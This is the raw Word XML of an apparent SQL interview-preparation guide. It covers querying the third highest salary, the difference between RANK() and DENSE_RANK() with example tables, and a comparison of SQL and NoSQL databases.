            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C5F9118"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94E09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01DBE82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r w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="569BE6B0" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C5B69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6FAB98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BABBDC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r>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="775E6FB4" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EDC9A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7E5DCBB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F5DAA6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r>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="3CF72583" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF0413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80248A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7AA8E8C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bl>
    <w:p w14:paraId="7066D8F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377"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="1E1414C6" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="349DAB4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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FBFD9D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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="4F4E0591" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036DAE5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1C64B9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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="50DEC4B3" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F386A3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3250627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cience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="674DA784" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D2CF3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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1092B59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istory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2920533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07"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="4AC14501" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58260E4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46FF49DC"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r>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="70CF055A" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7381072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7FC9AE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6A176B" w:rsidRPr="005C1C9E" w14:paraId="1451CC6D" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510D367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02EE8ADC"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r>
    </w:tbl>
    <w:p w14:paraId="211C356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students who have "Mathematics" as their subject are John and Priya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B3A3F" w14:textId="6249E03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3277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01569A29" w14:textId="7054F45C" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00E53691">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="799" w:name="_Toc197868013"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="0099012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99012D"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3rd highest salary of an employee</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="799"/>
    </w:p>
    <w:p w14:paraId="52288CD8" w14:textId="1442C504"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get the 3rd highest salary of an employee, you can use different methods in SQL. Here's an example using the LIMIT and OFFSET approach (in MySQL) or using ROW_NUMBER() (in SQL Server, PostgreSQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B009B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Using LIMIT and OFFSET (for MySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14729E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0C3B7F6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61930C6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emp_sal DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615077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LIMIT 1 OFFSET 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F43C8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sorts the employee salaries in descending order and then skips the first two highest salaries (using OFFSET 2). After that, it selects the next salary, which will be the 3rd highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3358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Using ROW_NUMBER() (for SQL Server, PostgreSQL, Oracle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA3DA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WITH RankedSalaries AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B60C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sal, ROW_NUMBER() OVER (ORDER BY emp_sal DESC) AS RowNum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC352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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091F7C2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17EB728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3E94CCD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Salaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83A90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Num = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF93A1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uses the ROW_NUMBER() window function to assign a unique rank to each salary in descending order. Then, it selects the salary where the RowNum is 3, which will give the 3rd highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E45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Both methods should work depending on the SQL database you're using.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2AD60" w14:textId="3189042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3278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D530B9B" w14:textId="3E278002" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="001075F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="800" w:name="_Toc197868014"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is dense and rank in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="800"/>
    </w:p>
    <w:p w14:paraId="76FFAE89" w14:textId="529B9826" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522B"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In SQL, DENSE_RANK() and RANK() are both window functions used to assign ranks to rows based on the order of a column. The key difference between them lies in how they handle ties (rows with the same value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D7C7D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RANK()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B3A2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The RANK() function assigns a unique rank to each distinct value in the ordered result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9203D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n there are ties (rows with the same value), RANK() skips subsequent rank numbers, meaning it leaves gaps in the ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A93E4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but the next rank will be skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6B2A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9BFDB5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33"/>
      </w:tblGrid>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="05570613" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="104DDD4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62E329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r>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="3A3145D2" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7690C41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2AC09C1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r>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="7D13B6A4" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F5061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19C6DC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063A6518" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78529FC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14C9367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4477D930" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09450D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927BC8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r>
    </w:tbl>
    <w:p w14:paraId="44D3D9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RANK():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E605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RANK() OVER (ORDER BY Salary DESC) AS Rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A250C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4F02C3F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532"/>
      </w:tblGrid>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="42E2BEB1" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38244EAB"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63EAC69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0D1923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ank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="3065640A" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FBA521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EAE768"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43BC787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71F77A55" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CBB97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039F53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24B689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320EC77A" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1D1227"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7C4E44F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61B9DAE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4412595" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C074FB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F89E26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27BEF81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bl>
    <w:p w14:paraId="324BB60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s you can see, since Jane and Jack have the same salary, they both get the rank 2, but the next rank given is 4, skipping 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D93B9F0"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DENSE_RANK()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750DBE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DENSE_RANK() function also assigns a rank to each distinct value in the ordered result set, but unlike RANK(), there are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no gaps</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the ranking when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041194E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and the next rank will be the immediate next number without any gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189FCD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5B4BFC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the same data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E3E0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DENSE_RANK() OVER (ORDER BY Salary DESC) AS DenseRank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530ECC1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79B7781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1098"/>
      </w:tblGrid>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="6892D709" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E88363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A93FC9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3A4E4AA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nseRank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="65CDEC15" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6450637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B0494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79D46FB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07A2BBBB" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27E6DB8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E8104E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6A65F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45ECB156" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0908B59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2E2B7F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55B619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3E5478F" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="245C1C5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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB8F9B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5F51E5A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6DF722B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since Jane and Jack have the same salary, they both get the rank 2, but the next rank is 3, without skipping any numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCE58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Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD8A4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Can produce gaps in ranking when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE049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Does not produce gaps and assigns consecutive ranks even when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3871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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92AD4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xml:space="preserve"> is useful when you want to maintain the ranking sequence, accounting for the skipped ranks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EB63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xml:space="preserve"> is useful when you want to have consecutive ranks even if there are ties in the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18757924" w14:textId="64CF9BEE"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3279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BB3EF" w14:textId="3B3ABD97" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="0090522B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="801" w:name="_Toc197868015"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0067691E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between SQL and NoSQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
    </w:p>
    <w:p w14:paraId="4DF9FCDB" w14:textId="74F58175"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Structured Query Language) and </w:t>
      </w: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Not Only SQL) databases lies in their data models, scalability, consistency, and types of operations they support. Here’s a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6639F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Data Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9D15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F706A3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lational database management systems (RDBMS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8A7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s structured in tables (rows and columns), and schema is defined ahead of time (schema-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E2DA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ables are related to each other via keys (primary key, foreign key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AC8F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ySQL, PostgreSQL, Oracle, MS SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DA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718CA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n-relational databases with flexible schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FDF7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can be stored in various forms: key-value pairs, documents, wide-column stores, or graphs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBB6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hema is dynamic (schema-less) and can evolve without affecting the entire database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423A07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ongoDB (Document Store), Cassandra (Wide-Column Store), Redis (Key-Value Store), Neo4j (Graph DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0AA2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Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CBD1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68DE44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Vertical Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SQL databases are typically scaled by increasing the power of a single server (adding CPU, RAM, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C67D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aling is often more challenging and expensive because scaling a monolithic RDBMS requires significant resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA885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1B10132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Horizontal Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: NoSQL databases are designed to scale out by adding more servers or nodes to the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC84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inherently better suited for distributing data across multiple servers, making them easier to scale and more cost-effective for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25343CE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ransactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601237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5F375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CID (Atomicity, Consistency, Isolation, Durability)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties ensure reliable and consistent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800301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Great for applications where data consistency and integrity are critical, such as financial systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4182C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5E43BEE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Generally, NoSQL databases focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eventual Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than strict consistency, prioritizing availability and partition tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF61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ome NoSQL databases (e.g., MongoDB, Couchbase) offer limited ACID support, but not all NoSQL databases guarantee full ACID compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5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of eventual consistency are observed in distributed systems like Cassandra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2A4D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Query Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BB4F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B0A12D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Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Structured Query Language (SQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for querying and managing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80A0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provides a powerful, standardized syntax for querying and manipulating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9996A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queries are powerful for joining multiple tables, filtering, aggregating, and ensuring relational integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08365EB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8DB58E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do not have a uniform query language. Each NoSQL database uses its own query methods or APIs (e.g., MongoDB uses JSON-like queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDB2D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se databases are more flexible and can store unstructured or semi-structured data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F39D2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5. Data Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1BFD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18942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rong data integrity using constraints (e.g., primary keys, foreign keys, unique constraints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE312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nsures data consistency across related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407000E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3DF7B0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ntegrity is less strict, as NoSQL databases allow for flexible schema designs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8099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re may not be strict relationships between data, and denormalization is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C016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Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DEB4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FD9265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deal for applications requiring strong consistency and complex querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489FCB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Banking systems, Enterprise applications, CRM systems, ERP systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355140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transactional systems (OLTP - Online Transaction Processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934E0B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C9CFEA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Better suited for large-scale applications with variable data and high throughput.</w:t>
      </w:r>
    </w:p>
